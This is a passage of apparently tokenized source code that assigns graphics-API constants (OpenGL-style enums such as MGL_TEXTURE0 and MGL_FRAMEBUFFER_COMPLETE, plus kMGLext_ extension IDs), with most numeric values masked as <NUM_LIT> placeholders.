MGL_MAP2_VERTEX_ATTRIB3_4_NV = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_NORMAL_MODE_QUADRATIC_ATI = <NUM_LIT> <EOL> MGL_PRIMITIVE_ID_NV = <NUM_LIT> <EOL> 
MGL_TEXTURE2_ARB = <NUM_LIT> <EOL> MGL_DECR_WRAP_EXT = <NUM_LIT> <EOL> MGL_GEQUAL = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_NORMAL_MODE_LINEAR_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_TEXTURE11 = <NUM_LIT> <EOL> MGL_TEXTURE_GREEN_TYPE = <NUM_LIT> <EOL> MGL_FOG_START = <NUM_LIT> <EOL> MGL_FIXED_ONLY = <NUM_LIT> <EOL> kMGLext_EXT_cull_vertex = <NUM_LIT:50> <EOL> MGL_VERTEX_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_POINT_MODE_CUBIC_ATI = <NUM_LIT> <EOL> MGL_CLIP_DISTANCE_NV = <NUM_LIT> <EOL> MGL_SOURCE2_RGB = <NUM_LIT> <EOL> MGL_FOG_DENSITY = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_POINT_MODE_LINEAR_ATI = <NUM_LIT> <EOL> MGL_TEXTURE27_ARB = <NUM_LIT> <EOL> MGL_TEXTURE9 = <NUM_LIT> <EOL> MGL_FOG_INDEX = <NUM_LIT> <EOL> MGL_LEQUAL = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_TESSELATION_LEVEL_ATI = <NUM_LIT> <EOL> MGL_SOURCE2_RGB_EXT = <NUM_LIT> <EOL> MGL_BACK_SECONDARY_COLOR_NV = <NUM_LIT> <EOL> MGL_FOG = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_NORMAL_MODE_ATI = <NUM_LIT> <EOL> MGL_POLYGON_STIPPLE_BIT = <NUM_LIT:16> <EOL> MGL_OBJECT_ACTIVE_UNIFORM_MAX_LENGTH_ARB = <NUM_LIT> <EOL> MGL_BACK_PRIMARY_COLOR_NV = <NUM_LIT> <EOL> MGL_COLOR_MATERIAL = <NUM_LIT> <EOL> MGL_VBO_FREE_MEMORY_ATI = <NUM_LIT> <EOL> kMGLext_texture_env_combine = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_POINT_MODE_ATI = <NUM_LIT> <EOL> MGL_BUFFER_MAP_POINTER_ARB = <NUM_LIT> <EOL> MGL_MATRIX_EXT = <NUM_LIT> <EOL> MGL_COLOR_MATERIAL_PARAMETER = <NUM_LIT> <EOL> MGL_MAX_PN_TRIANGLES_TESSELATION_LEVEL_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_BUFFER_MAPPED_ARB = <NUM_LIT> <EOL> MGL_COLOR_MATERIAL_FACE = <NUM_LIT> <EOL> MGL_DRAW_BUFFER = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_ATI = <NUM_LIT> <EOL> MGL_BUFFER_ACCESS_ARB = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_LOCAL_VIEWER = <NUM_LIT> <EOL> MGL_SHADE_MODEL = <NUM_LIT> <EOL> MGL_QUERY_RESULT_AVAILABLE_ARB = <NUM_LIT> <EOL> MGL_TEXTURE26_ARB = <NUM_LIT> <EOL> MGL_BUFFER_USAGE_ARB = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_AMBIENT = <NUM_LIT> <EOL> 
MGL_OUTPUT_TEXTURE_COORD9_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_ENV = <NUM_LIT> <EOL> MGL_QUERY_RESULT_ARB = <NUM_LIT> <EOL> MGL_TEXTURE2 = <NUM_LIT> <EOL> MGL_MAX_VERTEX_TEXTURE_IMAGE_UNITS_ARB = <NUM_LIT> <EOL> MGL_CURRENT_QUERY_ARB = <NUM_LIT> <EOL> MGL_CON_28_ATI = <NUM_LIT> <EOL> MGL_TEXTURE1 = <NUM_LIT> <EOL> MGL_INVALID_ENUM = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA_ARB = <NUM_LIT> <EOL> MGL_NOOP = <NUM_LIT> <EOL> MGL_SAMPLES_PASSED_ARB = <NUM_LIT> <EOL> MGL_TEXTURE0 = <NUM_LIT> <EOL> MGL_ALL_ATTRIB_BITS = <NUM_LIT> <EOL> MGL_COMPRESSED_RGB_ARB = <NUM_LIT> <EOL> MGL_REG_14_ATI = <NUM_LIT> <EOL> kMGLext_NV_register_combiners = <NUM_LIT> <EOL> MGL_PIXEL_MAP_B_TO_B = <NUM_LIT> <EOL> MGL_OP_SET_GE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPONENTS = <NUM_LIT> <EOL> MGL_COMPRESSED_INTENSITY_ARB = <NUM_LIT> <EOL> MGL_SWIZZLE_STQ_ATI = <NUM_LIT> <EOL> MGL_PIXEL_COUNT_AVAILABLE_NV = <NUM_LIT> <EOL> MGL_LOGIC_OP = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_BIAS_NV = <NUM_LIT> <EOL> MGL_FLOAT_MAT4_ARB = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_PIXEL_MAP_R_TO_R = <NUM_LIT> <EOL> MGL_TEXTURE25_ARB = <NUM_LIT> <EOL> MGL_TEXTURE4 = <NUM_LIT> <EOL> MGL_GENERATE_MIPMAP_SGIS = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE_ARB = <NUM_LIT> <EOL> MGL_3_BYTES = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_S = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_A = <NUM_LIT> <EOL> MGL_TEXTURE_2D_BINDING = <NUM_LIT> <EOL> MGL_OCCLUSION_TEST_RESULT_HP = <NUM_LIT> <EOL> MGL_FLOAT_MAT2_ARB = <NUM_LIT> <EOL> kMGLext_histogram = <NUM_LIT> <EOL> MGL_XOR = <NUM_LIT> <EOL> MGL_PIXEL_COUNTER_BITS_NV = <NUM_LIT> <EOL> MGL_CON_27_ATI = <NUM_LIT> <EOL> MGL_OCCLUSION_TEST_HP = <NUM_LIT> <EOL> MGL_SOURCE3_RGB_NV = <NUM_LIT> <EOL> MGL_TEXTURE_MATRIX = <NUM_LIT> <EOL> MGL_BOOL_VEC4_ARB = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB0_4_NV = <NUM_LIT> <EOL> MGL_NUM_FRAGMENT_REGISTERS_ATI = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_G = <NUM_LIT> <EOL> MGL_ADD_SIGNED = <NUM_LIT> <EOL> MGL_FOG_SPECULAR_TEXTURE_WIN = <NUM_LIT> <EOL> 
MGL_MAP2_INDEX = <NUM_LIT> <EOL> MGL_VARIANT_EXT = <NUM_LIT> <EOL> MGL_BOOL_VEC3_ARB = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_R = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY = <NUM_LIT> <EOL> MGL_PHONG_HINT_WIN = <NUM_LIT> <EOL> MGL_BOOL_VEC2_ARB = <NUM_LIT> <EOL> MGL_COLOR_LOGIC_OP = <NUM_LIT> <EOL> MGL_NUM_GENERAL_COMBINERS_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_S_TO_S = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_PRIMITIVES_WRITTEN_EXT = <NUM_LIT> <EOL> MGL_INVALID_FRAMEBUFFER_OPERATION = <NUM_LIT> <EOL> MGL_PHONG_WIN = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_SCALE_NV = <NUM_LIT> <EOL> MGL_MAX_LIGHTS = <NUM_LIT> <EOL> MGL_BOOL_ARB = <NUM_LIT> <EOL> kMGLext_ARB_vertex_program = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_I = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_PRIMITIVES_WRITTEN_NV = <NUM_LIT> <EOL> MGL_COLOR_INDEX16_EXT = <NUM_LIT> <EOL> MGL_INT_VEC4_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_Q = <NUM_LIT> <EOL> MGL_COLOR_INDEX12_EXT = <NUM_LIT> <EOL> MGL_CONSTANT_ALPHA = <NUM_LIT> <EOL> kMGLext_multi_draw_arrays = <NUM_LIT> <EOL> MGL_INT_VEC3_ARB = <NUM_LIT> <EOL> MGL_VARIABLE_E_NV = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_R = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY9_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_GREEN_SIZE_EXT = <NUM_LIT> <EOL> MGL_COLOR_INDEX8_EXT = <NUM_LIT> <EOL> MGL_SRC_COLOR = <NUM_LIT> <EOL> MGL_INT_VEC2_ARB = <NUM_LIT> <EOL> MGL_COPY = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_extensions_string = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_T = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD28_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_FOG_EXT = <NUM_LIT> <EOL> MGL_MODELVIEW0_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_S = <NUM_LIT> <EOL> MGL_OP_MAX_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD27_EXT = <NUM_LIT> <EOL> MGL_FLOAT_VEC3_ARB = <NUM_LIT> <EOL> MGL_INDEX_LOGIC_OP = <NUM_LIT> <EOL> MGL_FOG_HINT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD26_EXT = <NUM_LIT> <EOL> MGL_CULL_FACE_MODE = <NUM_LIT> <EOL> MGL_MODELVIEW_MATRIX1_EXT = <NUM_LIT> <EOL> MGL_POLYGON_SMOOTH_HINT = <NUM_LIT> 
<EOL> MGL_TEXTURE23_ARB = <NUM_LIT> <EOL> MGL_DST_ALPHA = <NUM_LIT> <EOL> MGL_PROGRAM_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_MODELVIEW0_MATRIX_EXT = <NUM_LIT> <EOL> MGL_LINE_SMOOTH_HINT = <NUM_LIT> <EOL> kMGLext_MGLX_create_context_with_config_sgix = <NUM_LIT> <EOL> MGL_ONE_MINUS_DST_ALPHA = <NUM_LIT> <EOL> MGL_PACK_SWAP_BYTES = <NUM_LIT> <EOL> MGL_MODELVIEW1_STACK_DEPTH_EXT = <NUM_LIT> <EOL> MGL_TRANSPOSE_COLOR_MATRIX_ARB = <NUM_LIT> <EOL> MGL_POINT_SMOOTH_HINT = <NUM_LIT> <EOL> MGL_CON_25_ATI = <NUM_LIT> <EOL> MGL_COLOR_TABLE_ALPHA_SIZE_EXT = <NUM_LIT> <EOL> MGL_POINT_SMOOTH = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_MODELVIEW0_STACK_DEPTH_EXT = <NUM_LIT> <EOL> MGL_NORMAL_MAP = <NUM_LIT> <EOL> MGL_PERSPECTIVE_CORRECTION_HINT = <NUM_LIT> <EOL> MGL_ONE_MINUS_DST_COLOR = <NUM_LIT> <EOL> MGL_SRC_ALPHA = <NUM_LIT> <EOL> MGL_BACK_RIGHT = <NUM_LIT> <EOL> MGL_OBJECT_ACTIVE_UNIFORMS_ARB = <NUM_LIT> <EOL> MGL_RENDER_MODE = <NUM_LIT> <EOL> MGL_OP_FRAC_EXT = <NUM_LIT> <EOL> MGL_SRC_ALPHA_SATURATE = <NUM_LIT> <EOL> MGL_OBJECT_ATTACHED_OBJECTS_ARB = <NUM_LIT> <EOL> MGL_LOGIC_OP_MODE = <NUM_LIT> <EOL> kMGLext_EXT_compiled_vertex_array = <NUM_LIT> <EOL> MGL_STEREO = <NUM_LIT> <EOL> MGL_OBJECT_DELETE_STATUS_ARB = <NUM_LIT> <EOL> MGL_COLOR_TABLE_RED_SIZE_EXT = <NUM_LIT> <EOL> MGL_REG_31_ATI = <NUM_LIT> <EOL> MGL_OBJECT_INFO_LOG_LENGTH_ARB = <NUM_LIT> <EOL> MGL_DOUBLEBUFFER = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY4_NV = <NUM_LIT> <EOL> MGL_CLIP_PLANE1 = <NUM_LIT> <EOL> MGL_OBJECT_VALIDATE_STATUS_ARB = <NUM_LIT> <EOL> MGL_UNSIGNED_BYTE = <NUM_LIT> <EOL> MGL_RGBA_MODE = <NUM_LIT> <EOL> MGL_COLOR_TABLE_FORMAT_EXT = <NUM_LIT> <EOL> MGL_OBJECT_LINK_STATUS_ARB = <NUM_LIT> <EOL> MGL_INDEX_MODE = <NUM_LIT> <EOL> MGL_ABGR_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD17_EXT = <NUM_LIT> <EOL> MGL_OBJECT_COMPILE_STATUS_ARB = <NUM_LIT> <EOL> MGL_MULTISAMPLE_BIT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSED_ARB = <NUM_LIT> <EOL> kMGLext_texture_env_add = <NUM_LIT:12> 
<EOL> MGL_COLOR_WRITEMASK = <NUM_LIT> <EOL> MGL_COLOR_BUFFER_BIT = <NUM_LIT> <EOL> MGL_DYNAMIC_DRAW_ARB = <NUM_LIT> <EOL> MGL_REG_13_ATI = <NUM_LIT> <EOL> MGL_COLOR_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_OP_MADD_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD15_EXT = <NUM_LIT> <EOL> MGL_OBJECT_SUBTYPE_ARB = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_RECTANGLE = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_render_texture = <NUM_LIT> <EOL> MGL_INDEX_WRITEMASK = <NUM_LIT> <EOL> MGL_ALWAYS = <NUM_LIT> <EOL> MGL_SHADER_OPERATION_NV = <NUM_LIT> <EOL> kMGLext_ARB_texture_rectangle = <NUM_LIT> <EOL> MGL_OBJECT_TYPE_ARB = <NUM_LIT> <EOL> MGL_INDEX_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY3_NV = <NUM_LIT> <EOL> MGL_ACCUM_BUFFER_BIT = <NUM_LIT> <EOL> MGL_PROGRAM_OBJECT_ARB = <NUM_LIT> <EOL> MGL_PROGRAM_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_SCISSOR_TEST = <NUM_LIT> <EOL> MGL_T4F_V4F = <NUM_LIT> <EOL> MGL_RENDERBUFFER_FREE_MEMORY_ATI = <NUM_LIT> <EOL> MGL_SCISSOR_BOX = <NUM_LIT> <EOL> MGL_CLAMP_TO_EDGE = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD11_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_FREE_MEMORY_ATI = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_BINDING_EXT = <NUM_LIT> <EOL> MGL_READ_BUFFER = <NUM_LIT> <EOL> MGL_VARIABLE_G_NV = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD10_EXT = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_X = <NUM_LIT> <EOL> kMGLext_NV_fence = <NUM_LIT> <EOL> MGL_CLAMP_READ_COLOR = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY = <NUM_LIT> <EOL> MGL_GREATER = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_EVICTED_MEMORY_NVX = <NUM_LIT> <EOL> MGL_NUM_INSTRUCTIONS_TOTAL_ATI = <NUM_LIT> <EOL> MGL_AUX_BUFFERS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD8_EXT = <NUM_LIT> <EOL> MGL_REG_29_ATI = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_EVICTION_COUNT_NVX = <NUM_LIT> <EOL> MGL_CLAMP_VERTEX_COLOR = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY2_NV = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD7_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Y = <NUM_LIT> <EOL> 
MGL_TEXTURE_FLOAT_COMPONENTS_NV = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_CURRENT_AVAILABLE_VIDMEM_NVX = <NUM_LIT> <EOL> MGL_TEXTURE_MIN_FILTER = <NUM_LIT> <EOL> MGL_RGBA_FLOAT_MODE = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD6_EXT = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_TOTAL_AVAILABLE_MEMORY_NVX = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_ARB = <NUM_LIT> <EOL> kMGLext_blend_subtract = <NUM_LIT> <EOL> MGL_MAX_RECTANGLE_TEXTURE_SIZE = <NUM_LIT> <EOL> MGL_DOT3_RGBA = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD5_EXT = <NUM_LIT> <EOL> MGL_GPU_MEMORY_INFO_DEDICATED_VIDMEM_NVX = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_EXT = <NUM_LIT> <EOL> MGL_BLEND = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD4_EXT = <NUM_LIT> <EOL> MGL_CURRENT_SECONDARY_COLOR_EXT = <NUM_LIT> <EOL> MGL_ORDER = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_INVERT = <NUM_LIT> <EOL> MGL_BLEND_SRC = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_2D = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD3_EXT = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_VALUE = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_FACTOR = <NUM_LIT> <EOL> MGL_BLEND_DST = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD2_EXT = <NUM_LIT> <EOL> MGL_REG_28_ATI = <NUM_LIT> <EOL> MGL_SEPARATE_ATTRIBS_EXT = <NUM_LIT> <EOL> MGL_DITHER = <NUM_LIT> <EOL> MGL_MATRIX23 = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD1_EXT = <NUM_LIT> <EOL> MGL_SAMPLE_BUFFERS = <NUM_LIT> <EOL> MGL_ALPHA_TEST_REF = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_CUBE_MAP = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD0_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_LUMINANCE_SIZE = <NUM_LIT> <EOL> MGL_4D_COLOR_TEXTURE = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT15 = <NUM_LIT> <EOL> MGL_CON_21_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY8_NV = <NUM_LIT> <EOL> MGL_MAX_CLIP_PLANES = <NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_ONE = <NUM_LIT> <EOL> MGL_SAMPLES = <NUM_LIT> <EOL> kMGLext_frame_buffer_object = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT14 = <NUM_LIT> <EOL> MGL_SCISSOR_BIT = <NUM_LIT> <EOL> MGL_OUTPUT_COLOR0_EXT = <NUM_LIT> <EOL> 
MGL_COLOR_SUM_EXT = <NUM_LIT> <EOL> MGL_SAMPLE_ALPHA_TO_COVERAGE = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT13 = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_1D = <NUM_LIT> <EOL> MGL_MAX_EVAL_ORDER = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Y = <NUM_LIT> <EOL> MGL_MULTISAMPLE = <NUM_LIT> <EOL> MGL_REPEAT = <NUM_LIT> <EOL> MGL_RGBA16F = <NUM_LIT> <EOL> MGL_REG_27_ATI = <NUM_LIT> <EOL> MGL_TRANSPOSE_COLOR_MATRIX = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT11 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY0_NV = <NUM_LIT> <EOL> MGL_OP_MULTIPLY_MATRIX_EXT = <NUM_LIT> <EOL> MGL_TRANSPOSE_TEXTURE_MATRIX = <NUM_LIT> <EOL> MGL_EQUAL = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT10 = <NUM_LIT> <EOL> kMGLext_MGLX_choose_fbconfig_sgix = <NUM_LIT> <EOL> MGL_WRITE_ONLY_ARB = <NUM_LIT> <EOL> MGL_OP_CROSS_PRODUCT_EXT = <NUM_LIT> <EOL> MGL_TRANSPOSE_PROJECTION_MATRIX = <NUM_LIT> <EOL> MGL_INTENSITY32F = <NUM_LIT> <EOL> MGL_CON_20_ATI = <NUM_LIT> <EOL> MGL_ALPHA_SCALE = <NUM_LIT> <EOL> MGL_TRANSPOSE_MODELVIEW_MATRIX = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT8 = <NUM_LIT> <EOL> MGL_OP_RECIP_SQRT_EXT = <NUM_LIT> <EOL> MGL_STREAM_COPY_ARB = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_UNITS = <NUM_LIT> <EOL> MGL_RGB32F = <NUM_LIT> <EOL> MGL_TEXTURE_RESIDENT = <NUM_LIT> <EOL> MGL_BLUE_SCALE = <NUM_LIT> <EOL> MGL_CLIENT_ACTIVE_TEXTURE = <NUM_LIT> <EOL> MGL_LUMINANCE16F = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT6 = <NUM_LIT> <EOL> MGL_GREEN_BIAS = <NUM_LIT> <EOL> MGL_BITMAP_TOKEN = <NUM_LIT> <EOL> MGL_ACTIVE_TEXTURE = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT5 = <NUM_LIT> <EOL> MGL_SELECTION_BUFFER_SIZE = <NUM_LIT> <EOL> MGL_GREEN_SCALE = <NUM_LIT> <EOL> MGL_TEXTURE31 = <NUM_LIT> <EOL> MGL_TRANSFORM_BIT = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT4 = <NUM_LIT> <EOL> MGL_ZOOM_Y = <NUM_LIT> <EOL> MGL_FLOAT_RGBA32_NV = <NUM_LIT> <EOL> MGL_MVP_MATRIX_EXT = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT3 = <NUM_LIT> <EOL> MGL_ZOOM_X = <NUM_LIT> <EOL> MGL_CURRENT_VERTEX_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_IMAGE_SIZE_ARB = <NUM_LIT> <EOL> kMGLext_texture_cube_map = 
<NUM_LIT:11> <EOL> MGL_COLOR_ATTACHMENT2 = <NUM_LIT> <EOL> MGL_RED_BIAS = <NUM_LIT> <EOL> MGL_STREAM_READ_ARB = <NUM_LIT> <EOL> MGL_FULL_RANGE_EXT = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT1 = <NUM_LIT> <EOL> MGL_TEXTURE_PRIORITY = <NUM_LIT> <EOL> MGL_RED_SCALE = <NUM_LIT> <EOL> MGL_NORMALIZED_RANGE_EXT = <NUM_LIT> <EOL> MGL_INTENSITY16F = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT0 = <NUM_LIT> <EOL> MGL_INDEX_OFFSET = <NUM_LIT> <EOL> MGL_REG_25_ATI = <NUM_LIT> <EOL> MGL_NEGATIVE_ONE_EXT = <NUM_LIT> <EOL> MGL_ACCUM = <NUM_LIT> <EOL> MGL_VERTEX_PROGRAM_BINDING_NV = <NUM_LIT> <EOL> MGL_INDEX_SHIFT = <NUM_LIT> <EOL> MGL_ONE_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_COLOR1_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_UNSUPPORTED = <NUM_LIT> <EOL> MGL_MAP_STENCIL = <NUM_LIT> <EOL> MGL_FLOAT_RGBA16_NV = <NUM_LIT> <EOL> MGL_TEXTURE24 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_READ_BUFFER = <NUM_LIT> <EOL> MGL_TEXTURE_BINDING_CUBE_MAP_ARB = <NUM_LIT> <EOL> MGL_MAP_COLOR = <NUM_LIT> <EOL> MGL_NEGATIVE_W_EXT = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_CUBE_MAP_ARB = <NUM_LIT> <EOL> MGL_PACK_ALIGNMENT = <NUM_LIT> <EOL> MGL_STREAM_DRAW_ARB = <NUM_LIT> <EOL> MGL_CLIP_PLANE4 = <NUM_LIT> <EOL> MGL_CLAMP_FRAGMENT_COLOR = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_FORMATS = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_COMBINER1_NV = <NUM_LIT> <EOL> MGL_NEGATIVE_Y_EXT = <NUM_LIT> <EOL> MGL_ALPHA16F = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_DIMENSIONS = <NUM_LIT> <EOL> MGL_COMBINER0_NV = <NUM_LIT> <EOL> MGL_LINE_TOKEN = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD20_EXT = <NUM_LIT> <EOL> MGL_TEXTURE20 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_DUPLICATE_ATTACHMENT = <NUM_LIT> <EOL> MGL_TRACK_MATRIX_TRANSFORM_NV = <NUM_LIT> <EOL> MGL_PACK_ROW_LENGTH = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_X = <NUM_LIT> <EOL> MGL_TEXTURE19 = <NUM_LIT> <EOL> MGL_HINT_BIT = <NUM_LIT> <EOL> MGL_TEXTURE_MAG_FILTER = <NUM_LIT> <EOL> 
MGL_FRAMEBUFFER_INCOMPLETE_MISSING_ATTACHMENT = <NUM_LIT> <EOL> MGL_PACK_LSB_FIRST = <NUM_LIT> <EOL> MGL_FLOAT_RGB32_NV = <NUM_LIT> <EOL> MGL_TEXTURE18 = <NUM_LIT> <EOL> MGL_REFLECTION_MAP_ARB = <NUM_LIT> <EOL> kMGLext_blend_minmax = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_ATTACHMENT = <NUM_LIT> <EOL> MGL_8X_BIT_ATI = <NUM_LIT:4> <EOL> MGL_MAX_GENERAL_COMBINERS_NV = <NUM_LIT> <EOL> MGL_TEXTURE17 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_COMPLETE = <NUM_LIT> <EOL> MGL_COMBINER_SUM_OUTPUT_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_TEXTURE16 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_TEXTURE_3D_ZOFFSET = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_BINDING_EXT = <NUM_LIT> <EOL> MGL_COMBINER_CD_OUTPUT_NV = <NUM_LIT> <EOL> MGL_DSDT8_MAG8_NV = <NUM_LIT> <EOL> MGL_TEXTURE15 = <NUM_LIT> <EOL> MGL_RGB16F = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_TEXTURE_CUBE_MAP_FACE = <NUM_LIT> <EOL> MGL_COMBINER_AB_OUTPUT_NV = <NUM_LIT> <EOL> MGL_REG_23_ATI = <NUM_LIT> <EOL> MGL_TEXTURE14 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LEVEL = <NUM_LIT> <EOL> MGL_TRACK_MATRIX_NV = <NUM_LIT> <EOL> MGL_MATRIX22 = <NUM_LIT> <EOL> MGL_COMBINER_BIAS_NV = <NUM_LIT> <EOL> MGL_TEXTURE13 = <NUM_LIT> <EOL> MGL_OUTPUT_VERTEX_EXT = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_OBJECT_NAME = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP = <NUM_LIT> <EOL> MGL_COMBINER_SCALE_NV = <NUM_LIT> <EOL> MGL_FLOAT_RGB16_NV = <NUM_LIT> <EOL> MGL_TEXTURE12 = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_ATTACHMENT_OBJECT_TYPE = <NUM_LIT> <EOL> MGL_CON_16_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY7_NV = <NUM_LIT> <EOL> MGL_COMBINER_MUX_SUM_NV = <NUM_LIT> <EOL> MGL_MULT = <NUM_LIT> <EOL> kMGLext_SGIS_generate_mipmap = <NUM_LIT> <EOL> MGL_PRIMARY_COLOR = <NUM_LIT> <EOL> MGL_COMBINER_CD_DOT_PRODUCT_NV = <NUM_LIT> <EOL> 